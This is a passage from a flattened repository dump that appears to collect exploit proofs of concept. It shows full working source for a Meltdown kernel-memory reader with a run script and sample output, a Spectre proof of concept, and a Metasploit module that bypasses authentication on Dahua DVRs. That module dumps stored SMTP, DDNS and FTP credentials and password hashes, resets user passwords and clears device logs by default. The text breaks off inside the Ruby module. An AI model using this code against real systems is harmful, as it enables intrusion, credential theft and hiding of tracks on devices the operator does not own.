├── CPU_vul ├── linux │ ├── .gitignore │ ├── Makefile │ ├── README.md │ ├── meltdown.c │ └── run.sh └── win │ └── spectre_poc.c ├── Dahua_DVR_Auth_Bypass.rb ├── IIS_short_name_scanner.py ├── Jetleak-Testing-Script ├── README.md ├── jetleak_exp.py └── jetleak_tester.py ├── MS17-010 ├── ms17-010.php └── ms17-010.py ├── README.md ├── c0w.c ├── cve-2017-7269 ├── cve-2017-7269.rb └── readme.md ├── discuz_file_delete ├── exp.py └── readme.md ├── heartbleedtest.py ├── http_sys_test.py ├── java_RMI ├── attackRMI.jar ├── e8f31202-138f-4a60-adb1-114cce64afe1.jpg └── readme.md ├── jenkins_file_read ├── cve-2018-1999002.py └── readme.md ├── mongodb_unauth_access.py ├── nginx_range_overflow_cve-2017-7529.py ├── sqlinject ├── .DS_Store ├── README.txt ├── admin.php ├── admin_login.php ├── conn.php ├── index.php └── test.sql ├── ubuntu_tiquan.c ├── web_path+mima+msf_exp.md └── webshellscan ├── README.md └── webshellscan.py /CPU_vul/linux/.gitignore: -------------------------------------------------------------------------------- 1 | meltdown 2 | *.o 3 | -------------------------------------------------------------------------------- /CPU_vul/linux/Makefile: -------------------------------------------------------------------------------- 1 | 2 | CFLAGS += -O2 -msse2 3 | 4 | all: meltdown 5 | 6 | meltdown: meltdown.o 7 | 8 | clean: 9 | rm -f meltdown.o meltdown 10 | -------------------------------------------------------------------------------- /CPU_vul/linux/README.md: -------------------------------------------------------------------------------- 1 | # MELTDOWN EXPLOIT POC 2 | 3 | Speculative optimizations execute code in a non-secure manner leaving data 4 | traces in microarchitecture such as cache. 5 | 6 | Lipp et. al 2018 published their code 2018-01-09 at 7 | https://github.com/IAIK/meltdown. Look at their paper for details: 8 | https://meltdownattack.com/meltdown.pdf. 9 | 10 | Can only dump `linux_proc_banner` at the moment, since requires accessed memory 11 | to be in cache and `linux_proc_banner` is cached on every read from 12 | `/proc/version`. Might work with `prefetch`. Works with `sched_yield`. 13 | 14 | Build with `make`, run with `./run.sh`. 15 | 16 | Can't defeat KASLR yet, so you may need to enter your password to find 17 | `linux_proc_banner` in the `/proc/kallsyms` (or do it manually). 18 | 19 | Flush+Reload and target array approach taken from spectre paper https://spectreattack.com/spectre.pdf 20 | implemented following clues from https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/. 21 | 22 | Pandora's box is open. 23 | 24 | Result: 25 | ``` 26 | $ make 27 | cc -O2 -msse2 -c -o meltdown.o meltdown.c 28 | cc meltdown.o -o meltdown 29 | $ ./run.sh 30 | looking for linux_proc_banner in /proc/kallsyms 31 | protected. requires root 32 | + find_linux_proc_banner /proc/kallsyms sudo 33 | + sudo awk 34 | /linux_proc_banner/ { 35 | if (strtonum("0x"$1)) 36 | print $1; 37 | exit 0; 38 | } /proc/kallsyms 39 | + linux_proc_banner=ffffffffa3e000a0 40 | + set +x 41 | cached = 29, uncached = 271, threshold 88 42 | read ffffffffa3e000a0 = 25 % 43 | read ffffffffa3e000a1 = 73 s 44 | read ffffffffa3e000a2 = 20 45 | read ffffffffa3e000a3 = 76 v 46 | read ffffffffa3e000a4 = 65 e 47 | read ffffffffa3e000a5 = 72 r 48 | read ffffffffa3e000a6 = 73 s 49 | read ffffffffa3e000a7 = 69 i 50 | read ffffffffa3e000a8 = 6f o 51 | read ffffffffa3e000a9 = 6e n 52 | read ffffffffa3e000aa = 20 53 | read ffffffffa3e000ab = 25 % 54 | read ffffffffa3e000ac = 73 s 55 | read ffffffffa3e000ad = 20 56 | read ffffffffa3e000ae = 28 ( 57 | read ffffffffa3e000af = 62 b 58 | read ffffffffa3e000b0 = 75 u 59 | read ffffffffa3e000b1 = 69 i 60 | read ffffffffa3e000b2 = 6c l 61 | read ffffffffa3e000b3 = 64 d 62 | read ffffffffa3e000b4 = 64 d 63 | read ffffffffa3e000b5 = 40 @ 64 | VULNERABLE 65 | VULNERABLE ON 66 | 4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64 67 | processor : 0 68 | vendor_id : GenuineIntel 69 | cpu family : 6 70 | model : 158 71 | model name : Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz 72 | stepping : 9 73 | microcode : 0x5e 74 | cpu MHz : 3499.316 75 | cache size : 6144 KB 76 | physical id : 0 77 | ``` 78 | 79 | # Does not work 80 | 81 | If it compiles but fails with `Illegal instruction` then either your hardware 82 | is very old or it is a VM. Try compiling with: 83 | 84 | ```shell 85 | $ make CFLAGS=-DHAVE_RDTSCP=0 clean all 86 | ``` 87 | 88 | # Works on 89 | 90 | The Vulnerable CPU/Kernels list is moved here: 91 | https://github.com/paboldin/meltdown-exploit/issues/19 92 | 93 | The Invulnerable CPU/Kernels list is moved here: 94 | https://github.com/paboldin/meltdown-exploit/issues/22 95 | -------------------------------------------------------------------------------- /CPU_vul/linux/meltdown.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #include 12 | 13 | //#define DEBUG 1 14 | 15 | /* comment out if getting illegal insctructions error */ 16 | #ifndef HAVE_RDTSCP 17 | # define HAVE_RDTSCP 1 18 | #endif 19 | 20 | #if !(defined(__x86_64__) || defined(__i386__)) 21 | # error "Only x86-64 and i386 are supported at the moment" 22 | #endif 23 | 24 | 25 | #define TARGET_OFFSET 12 26 | #define TARGET_SIZE (1 << TARGET_OFFSET) 27 | #define BITS_READ 8 28 | #define VARIANTS_READ (1 << BITS_READ) 29 | 30 | static char target_array[VARIANTS_READ * TARGET_SIZE]; 31 | 32 | void clflush_target(void) 33 | { 34 | int i; 35 | 36 | for (i = 0; i < VARIANTS_READ; i++) 37 | _mm_clflush(&target_array[i * TARGET_SIZE]); 38 | } 39 | 40 | extern char stopspeculate[]; 41 | 42 | static void __attribute__((noinline)) 43 | speculate(unsigned long addr) 44 | { 45 | #ifdef __x86_64__ 46 | asm volatile ( 47 | "1:\n\t" 48 | 49 | ".rept 300\n\t" 50 | "add $0x141, %%rax\n\t" 51 | ".endr\n\t" 52 | 53 | "movzx (%[addr]), %%eax\n\t" 54 | "shl $12, %%rax\n\t" 55 | "jz 1b\n\t" 56 | "movzx (%[target], %%rax, 1), %%rbx\n" 57 | 58 | "stopspeculate: \n\t" 59 | "nop\n\t" 60 | : 61 | : [target] "r" (target_array), 62 | [addr] "r" (addr) 63 | : "rax", "rbx" 64 | ); 65 | #else /* ifdef __x86_64__ */ 66 | asm volatile ( 67 | "1:\n\t" 68 | 69 | ".rept 300\n\t" 70 | "add $0x141, %%eax\n\t" 71 | ".endr\n\t" 72 | 73 | "movzx (%[addr]), %%eax\n\t" 74 | "shl $12, %%eax\n\t" 75 | "jz 1b\n\t" 76 | "movzx (%[target], %%eax, 1), %%ebx\n" 77 | 78 | 79 | "stopspeculate: \n\t" 80 | "nop\n\t" 81 | : 82 | : [target] "r" (target_array), 83 | [addr] "r" (addr) 84 | : "rax", "rbx" 85 | ); 86 | #endif 87 | } 88 | 89 | static inline int 90 | get_access_time(volatile char *addr) 91 | { 92 | int time1, time2, junk; 93 | volatile int j; 94 | 95 | #if HAVE_RDTSCP 96 | time1 = __rdtscp(&junk); 97 | j = *addr; 98 | time2 = __rdtscp(&junk); 99 | #else 100 | time1 = __rdtsc(); 101 | j = *addr; 102 | _mm_mfence(); 103 | time2 = __rdtsc(); 104 | #endif 105 | 106 | return time2 - time1; 107 | } 108 | 109 | static int cache_hit_threshold; 110 | static int hist[VARIANTS_READ]; 111 | void check(void) 112 | { 113 | int i, time, mix_i; 114 | volatile char *addr; 115 | 116 | for (i = 0; i < VARIANTS_READ; i++) { 117 | mix_i = ((i * 167) + 13) & 255; 118 | 119 | addr = &target_array[mix_i * TARGET_SIZE]; 120 | time = get_access_time(addr); 121 | 122 | if (time <= cache_hit_threshold) 123 | hist[mix_i]++; 124 | } 125 | } 126 | 127 | void sigsegv(int sig, siginfo_t *siginfo, void *context) 128 | { 129 | ucontext_t *ucontext = context; 130 | 131 | #ifdef __x86_64__ 132 | ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate; 133 | #else 134 | ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate; 135 | #endif 136 | return; 137 | } 138 | 139 | int set_signal(void) 140 | { 141 | struct sigaction act = { 142 | .sa_sigaction = sigsegv, 143 | .sa_flags = SA_SIGINFO, 144 | }; 145 | 146 | return sigaction(SIGSEGV, &act, NULL); 147 | } 148 | 149 | #define CYCLES 1000 150 | int readbyte(int fd, unsigned long addr) 151 | { 152 | int i, ret = 0, max = -1, maxi = -1; 153 | static char buf[256]; 154 | 155 | memset(hist, 0, sizeof(hist)); 156 | 157 | for (i = 0; i < CYCLES; i++) { 158 | ret = pread(fd, buf, sizeof(buf), 0); 159 | if (ret < 0) { 160 | perror("pread"); 161 | break; 162 | } 163 | 164 | clflush_target(); 165 | 166 | speculate(addr); 167 | check(); 168 | } 169 | 170 | #ifdef DEBUG 171 | for (i = 0; i < VARIANTS_READ; i++) 172 | if (hist[i] > 0) 173 | printf("addr %lx hist[%x] = %d\n", addr, i, hist[i]); 174 | #endif 175 | 176 | for (i = 1; i < VARIANTS_READ; i++) { 177 | if (!isprint(i)) 178 | continue; 179 | if (hist[i] && hist[i] > max) { 180 | max = hist[i]; 181 | maxi = i; 182 | } 183 | } 184 | 185 | return maxi; 186 | } 187 | 188 | static char *progname; 189 | int usage(void) 190 | { 191 | printf("%s: [hexaddr] [size]\n", progname); 192 | return 2; 193 | } 194 | 195 | static int mysqrt(long val) 196 | { 197 | int root = val / 2, prevroot = 0, i = 0; 198 | 199 | while (prevroot != root && i++ < 100) { 200 | prevroot = root; 201 | root = (val / root + root) / 2; 202 | } 203 | 204 | return root; 205 | } 206 | 207 | #define ESTIMATE_CYCLES 1000000 208 | static void 209 | set_cache_hit_threshold(void) 210 | { 211 | long cached, uncached, i; 212 | 213 | if (0) { 214 | cache_hit_threshold = 80; 215 | return; 216 | } 217 | 218 | for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) 219 | cached += get_access_time(target_array); 220 | 221 | for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++) 222 | cached += get_access_time(target_array); 223 | 224 | for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) { 225 | _mm_clflush(target_array); 226 | uncached += get_access_time(target_array); 227 | } 228 | 229 | cached /= ESTIMATE_CYCLES; 230 | uncached /= ESTIMATE_CYCLES; 231 | 232 | cache_hit_threshold = mysqrt(cached * uncached); 233 | 234 | printf("cached = %ld, uncached = %ld, threshold %d\n", 235 | cached, uncached, cache_hit_threshold); 236 | } 237 | 238 | static int min(int a, int b) 239 | { 240 | return a < b ? a : b; 241 | } 242 | 243 | int main(int argc, char *argv[]) 244 | { 245 | int ret, fd, i, score, is_vulnerable; 246 | unsigned long addr, size; 247 | static char expected[] = "%s version %s"; 248 | 249 | progname = argv[0]; 250 | if (argc < 3) 251 | return usage(); 252 | 253 | if (sscanf(argv[1], "%lx", &addr) != 1) 254 | return usage(); 255 | 256 | if (sscanf(argv[2], "%lx", &size) != 1) 257 | return usage(); 258 | 259 | memset(target_array, 1, sizeof(target_array)); 260 | 261 | ret = set_signal(); 262 | 263 | set_cache_hit_threshold(); 264 | 265 | fd = open("/proc/version", O_RDONLY); 266 | if (fd < 0) { 267 | perror("open"); 268 | return -1; 269 | } 270 | 271 | for (score = 0, i = 0; i < size; i++) { 272 | ret = readbyte(fd, addr); 273 | if (ret == -1) 274 | ret = 0xff; 275 | printf("read %lx = %x %c (score=%d/%d)\n", 276 | addr, ret, isprint(ret) ? ret : ' ', 277 | ret != 0xff ? hist[ret] : 0, 278 | CYCLES); 279 | 280 | if (i < sizeof(expected) && 281 | ret == expected[i]) 282 | score++; 283 | 284 | addr++; 285 | } 286 | 287 | close(fd); 288 | 289 | is_vulnerable = score > min(size, sizeof(expected)) / 2; 290 | 291 | if (is_vulnerable) 292 | fprintf(stderr, "VULNERABLE\n"); 293 | else 294 | fprintf(stderr, "NOT VULNERABLE\n"); 295 | 296 | exit(is_vulnerable); 297 | } 298 | -------------------------------------------------------------------------------- /CPU_vul/linux/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | find_linux_proc_banner() { 4 | $2 sed -n -re 's/^([0-9a-f]*[1-9a-f][0-9a-f]*) .* linux_proc_banner$/\1/p' $1 5 | } 6 | 7 | echo "looking for linux_proc_banner in /proc/kallsyms" 8 | linux_proc_banner=$(find_linux_proc_banner /proc/kallsyms) 9 | if test -z $linux_proc_banner; then 10 | echo "protected. requires root" 11 | set -x 12 | linux_proc_banner=$(\ 13 | find_linux_proc_banner /proc/kallsyms sudo) 14 | 15 | set +x 16 | fi 17 | if test -z $linux_proc_banner; then 18 | echo "not found. reading /boot/System.map-$(uname -r)" 19 | set -x 20 | linux_proc_banner=$(\ 21 | find_linux_proc_banner /boot/System.map-$(uname -r) sudo) 22 | set +x 23 | fi 24 | if test -z $linux_proc_banner; then 25 | echo "not found. reading /boot/System.map" 26 | set -x 27 | linux_proc_banner=$(\ 28 | find_linux_proc_banner /boot/System.map sudo) 29 | set +x 30 | fi 31 | if test -z $linux_proc_banner; then 32 | echo "can't find linux_proc_banner, unable to test at all" 33 | exit 0 34 | fi 35 | 36 | if command -v taskset >/dev/null; then 37 | taskset 0x1 ./meltdown $linux_proc_banner 10 38 | else 39 | ./meltdown $linux_proc_banner 10 40 | fi 41 | vuln=$? 42 | 43 | if test $vuln -eq 132; then 44 | echo "ILLEGAL INSTRUCTION" 45 | echo "try recompile with:" 46 | echo " make CFLAGS='-DHAVE_RDTSCP=0' clean all" 47 | echo "and run again" 48 | fi 49 | if test $vuln -eq 1; then 50 | echo "PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/19" 51 | echo "VULNERABLE ON" 52 | uname -rvi 53 | head /proc/cpuinfo 54 | exit 1 55 | fi 56 | if test $vuln -eq 0; then 57 | echo "PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/22" 58 | echo "NOT VULNERABLE ON" 59 | uname -rvi 60 | head /proc/cpuinfo 61 | exit 0 62 | fi 63 | -------------------------------------------------------------------------------- /CPU_vul/win/spectre_poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #ifdef _MSC_VER 5 | #include 6 | #pragma optimize("gt", on) 7 | #else 8 | #include 9 | #endif 10 | 11 | #ifndef _MSC_VER 12 | #define sscanf_s sscanf 13 | #endif 14 | 15 | unsigned int array1_size = 16; 16 | uint8_t unused1[64]; 17 | uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16}; 18 | uint8_t unused2[64]; 19 | uint8_t array2[256 * 512]; 20 | 21 | char* secret = "pwned by elknot@360corpsec"; 22 | 23 | uint8_t temp = 0; 24 | 25 | void victim_function(size_t x) 26 | { 27 | if (x < array1_size) 28 | { 29 | temp &= array2[array1[x] * 512]; 30 | } 31 | } 32 | 33 | #define CACHE_HIT_THRESHOLD (80) 34 | 35 | void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) 36 | { 37 | static int results[256]; 38 | int tries, i, j, k, mix_i, junk = 0; 39 | size_t training_x, x; 40 | register uint64_t time1, time2; 41 | volatile uint8_t* addr; 42 | 43 | for (i = 0; i < 256; i++) 44 | results[i] = 0; 45 | for (tries = 999; tries > 0; tries--) 46 | { 47 | for (i = 0; i < 256; i++) 48 | _mm_clflush(&array2[i * 512]); 49 | training_x = tries % array1_size; 50 | for (j = 29; j >= 0; j--) 51 | { 52 | _mm_clflush(&array1_size); 53 | for (volatile int z = 0; z < 100; z++) 54 | { 55 | } 56 | x = ((j % 6) - 1) & ~0xFFFF; 57 | x = (x | (x >> 16)); 58 | x = training_x ^ (x & (malicious_x ^ training_x)); 59 | victim_function(x); 60 | } 61 | 62 | for (i = 0; i < 256; i++) 63 | { 64 | mix_i = ((i * 167) + 13) & 255; 65 | addr = &array2[mix_i * 512]; 66 | time1 = __rdtscp(&junk); 67 | junk = *addr; 68 | time2 = __rdtscp(&junk) - time1; 69 | if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size]) 70 | results[mix_i]++; 71 | } 72 | 73 | j = k = -1; 74 | for (i = 0; i < 256; i++) 75 | { 76 | if (j < 0 || results[i] >= results[j]) 77 | { 78 | k = j; 79 | j = i; 80 | } 81 | else if (k < 0 || results[i] >= results[k]) 82 | { 83 | k = i; 84 | } 85 | } 86 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 87 | break; 88 | } 89 | results[0] ^= junk; 90 | value[0] = (uint8_t)j; 91 | score[0] = results[j]; 92 | value[1] = (uint8_t)k; 93 | score[1] = results[k]; 94 | } 95 | 96 | int main(int argc, const char* * argv) 97 | { 98 | printf("Putting '%s' in memory\n", secret); 99 | size_t malicious_x = (size_t)(secret - (char *)array1); 100 | int i, score[2], len = strlen(secret); 101 | uint8_t value[2]; 102 | 103 | for (i = 0; i < sizeof(array2); i++) 104 | array2[i] = 1; 105 | if (argc == 3) 106 | { 107 | sscanf_s(argv[1], "%p", (void * *)(&malicious_x)); 108 | malicious_x -= (size_t)array1; 109 | sscanf_s(argv[2], "%d", &len); 110 | } 111 | 112 | printf("Reading %d bytes:\n", len); 113 | while (--len >= 0) 114 | { 115 | printf("Reading at malicious_x = %p... ", (void *)malicious_x); 116 | readMemoryByte(malicious_x++, value, score); 117 | printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear")); 118 | printf("0x%02X=’%c’ score=%d ", value[0], 119 | (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]); 120 | if (score[1] > 0) 121 | printf("(second best: 0x%02X score=%d)", value[1], score[1]); 122 | printf("\n"); 123 | } 124 | #ifdef _MSC_VER 125 | printf("Press ENTER to exit\n"); 126 | getchar(); 127 | #endif 128 | return (0); 129 | } 130 | -------------------------------------------------------------------------------- /Dahua_DVR_Auth_Bypass.rb: -------------------------------------------------------------------------------- 1 | require 'msf/core' 2 | class Metasploit3 < Msf::Auxiliary 3 | include Msf::Exploit::Remote::Tcp 4 | include Msf::Auxiliary::Scanner 5 | include Msf::Auxiliary::Report 6 | 7 | def initialize 8 | super( 9 | 'Name' => 'Dahua DVR Auth Bypas Scanner', 10 | 'Version' => '$Revision: 1 $', 11 | 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', 12 | 'Author' => 'Jake Reynolds - Depth Security', 13 | 'License' => MSF_LICENSE 14 | ) 15 | deregister_options('RHOST') 16 | register_options( 17 | [ 18 | OptString.new('USERNAME', [true, 'A username to reset', '888888']), 19 | OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), 20 | OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), 21 | OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), 22 | Opt::RPORT(37777) 23 | ], self.class) 24 | end 25 | 26 | def run_host(ip) 27 | usercount = 0 28 | u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 29 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 30 | dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" 31 | version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 32 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 33 | email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + 34 | "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 35 | ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + 36 | "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 37 | nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" + 38 | "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 39 | channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 40 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 41 | "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" + 42 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 43 | groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" + 44 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 45 | users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + 46 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 47 | sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + 48 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 49 | clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" + 50 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 51 | clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" + 52 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 53 | user = "root" 54 | pass = " w" 55 | user8pwhash = "4WzwxXxM" #888888 56 | user6pwhash = "sh15yfFM" #666666 57 | useradminpwhash = "6QNMIQGe" #admin 58 | connect() 59 | sock.put(u1) 60 | data = sock.recv(8) 61 | disconnect() 62 | if data == dvr_resp 63 | print_good("DVR FOUND: @ #{rhost}:#{rport}!") 64 | report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "Dahua-based DVR") 65 | connect() 66 | sock.put(version) 67 | data = sock.get(1024) 68 | if data =~ /[\x00]{8,}([[:print:]]+)/ 69 | ver = $1 70 | print_status("Version: #{ver} @ #{rhost}:#{rport}!") 71 | end 72 | 73 | sock.put(sn) 74 | data = sock.get(1024) 75 | if data =~ /[\x00]{8,}([[:print:]]+)/ 76 | serial = $1 77 | print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") 78 | end 79 | 80 | sock.put(email) 81 | if data = sock.get(1024).split('&&') 82 | print_status("Email Settings: @ #{rhost}:#{rport}!") 83 | if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ 84 | if mailhost = $1.split(':') 85 | print_status(" Server: #{mailhost[0]}") if !mailhost[0].nil? 86 | print_status(" Destination Email: #{data[1]}") if !mailhost[1].nil? 87 | end 88 | if !data[5].nil? and !data[6].nil? 89 | print_good(" SMTP User: #{data[5]}") if !data[5].nil? 90 | print_good(" SMTP Password: #{data[6]}") if !data[6].nil? 91 | report_auth_info(:host => mailhost[0], :port => mailhost[1], :user => data[5], 92 | :pass => data[6], :type => "Mail", :active => true) if ( !mailhost[0].nil? and 93 | !mailhost[1].nil? and !data[5].nil? and !data[6].nil? ) 94 | end 95 | end 96 | end 97 | 98 | sock.put(ddns) 99 | if data = sock.get(1024) 100 | data = data.split(/&&[0-1]&&/) 101 | data.each_with_index { 102 | |val, index| 103 | if index > 0 104 | val = val.split("&&") 105 | print_status("DDNS Settings @ #{rhost}:#{rport}!:") 106 | print_status(" DDNS Service: #{val[0]}") if !val.nil? 107 | print_status(" DDNS Server: #{val[1]}") if !val.nil? 108 | print_status(" DDNS Port: #{val[2]}") if !val.nil? 109 | print_status(" Domain: #{val[3]}") if !val.nil? 110 | print_good(" Username: #{val[4]}") if !val.nil? 111 | print_good(" Password: #{val[5]}") if !val.nil? 112 | report_auth_info(:host => val[1], :port => val[2], :user => val[4], :pass => val[5], :type => "DDNS", 113 | :active => true) if ( !val[1].nil? and !val[2].nil? and !val[4].nil? and !val[5].nil? ) 114 | end 115 | 116 | } 117 | end 118 | 119 | sock.put(nas) 120 | if data = sock.get(1024) 121 | print_status("Nas Settings @ #{rhost}:#{rport}!:") 122 | server = '' 123 | port = '' 124 | if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ 125 | server = $1.unpack('C*').join('.') 126 | port = $2.unpack('S') 127 | print_status(" Nas Server #{server}") 128 | print_status(" Nas Port: #{port}") 129 | end 130 | if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ 131 | ftpuser = $1 132 | ftppass = $2 133 | print_good(" FTP User: #{ftpuser}") 134 | print_good(" FTP Password: #{ftppass}") 135 | #report_auth_info(:host => server, :port => port, :user => ftpuser, :pass => ftppass, :type => "FTP", 136 | #:active => true) if ( !server.nil? and !port.nil? and !ftpuser.nil? and !ftppass.nil? ) 137 | end 138 | end 139 | 140 | sock.put(channels) 141 | data = sock.get(1024).split('&&') 142 | disconnect() 143 | if (data.length > 1) 144 | print_status("Camera Channels @ #{rhost}:#{rport}!:") 145 | data.each_with_index { 146 | |val, index| 147 | print_status(" #{index+1}:#{val[/([[:print:]]+)/]}") 148 | } 149 | end 150 | connect() 151 | sock.put(users) 152 | if data = sock.get(1024).split('&&') 153 | print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") 154 | data.each { 155 | |val| 156 | usercount += 1 157 | print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") 158 | } 159 | end 160 | sock.put(groups) 161 | if data = sock.get(1024).split('&&') 162 | print_status("User Groups: @ #{rhost}:#{rport}!") 163 | data.each { 164 | |val| 165 | print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") 166 | } 167 | end 168 | if (datastore['RESET']) 169 | userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + 170 | ":" + datastore['PASSWORD'] 171 | u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + 172 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 173 | u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 174 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 175 | u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" + 176 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 177 | userstring 178 | sock.put(u1) 179 | data = sock.get(1024) 180 | sock.put(u2) 181 | data = sock.get(1024) 182 | sock.put(u3) 183 | data = sock.get(1024) 184 | sock.put(u1) 185 | if data = sock.get(1024) 186 | print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") 187 | end 188 | # elsif (datastore['ACTION'] == "DELETE") 189 | # u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + 190 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 191 | # u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" + 192 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 193 | # delete = "\xa6\x00\x00\x00#{datastore['USERNAME'].length.chr}\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" + 194 | # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + 195 | # datastore['USERNAME'] 196 | # print delete 197 | # sock.send(u1, 0) 198 | # sock.get_once 199 | # sock.send(delete, 0) 200 | # sock.get_once 201 | # sock.send(u2, 0) 202 | # sock.get_once 203 | # 204 | # 205 | # elsif (datastore['ACTION'] == "ADD") 206 | # userstring = (usercount + 1).to_s + ":" + datastore['USERNAME'] + ":" + datastore['PASSWORD'] 207 | # userstring << "\x3a\x31\x3a\x31\x2c\x32\x2c\x33\x2c\x34\x2c\x35\x2c\x36\x2c\x37" + 208 | # "\x2c\x38\x2c\x39\x2c\x31\x30\x2c\x31\x31\x2c\x32\x30\x2c\x32\x31" + 209 | # "\x2c\x32\x32\x2c\x32\x33\x2c\x32\x34\x2c\x32\x35\x2c\x32\x36\x2c" + 210 | # "\x32\x37\x2c\x32\x38\x2c\x33\x37\x2c\x33\x38\x2c\x33\x39\x2c\x34" + 211 | # "\x30\x2c\x34\x32\x2c\x34\x33\x2c\x34\x34\x2c\x34\x35\x2c\x34\x36" + 212 | # "\x2c\x34\x37\x2c\x34\x38\x2c\x34\x39\x2c\x35\x30\x2c\x35\x31\x2c" + 213 | # "\x35\x32\x2c\x35\x33\x2c\x35\x34\x2c\x35\x35\x2c\x35\x36\x2c\x35" + 214 | # 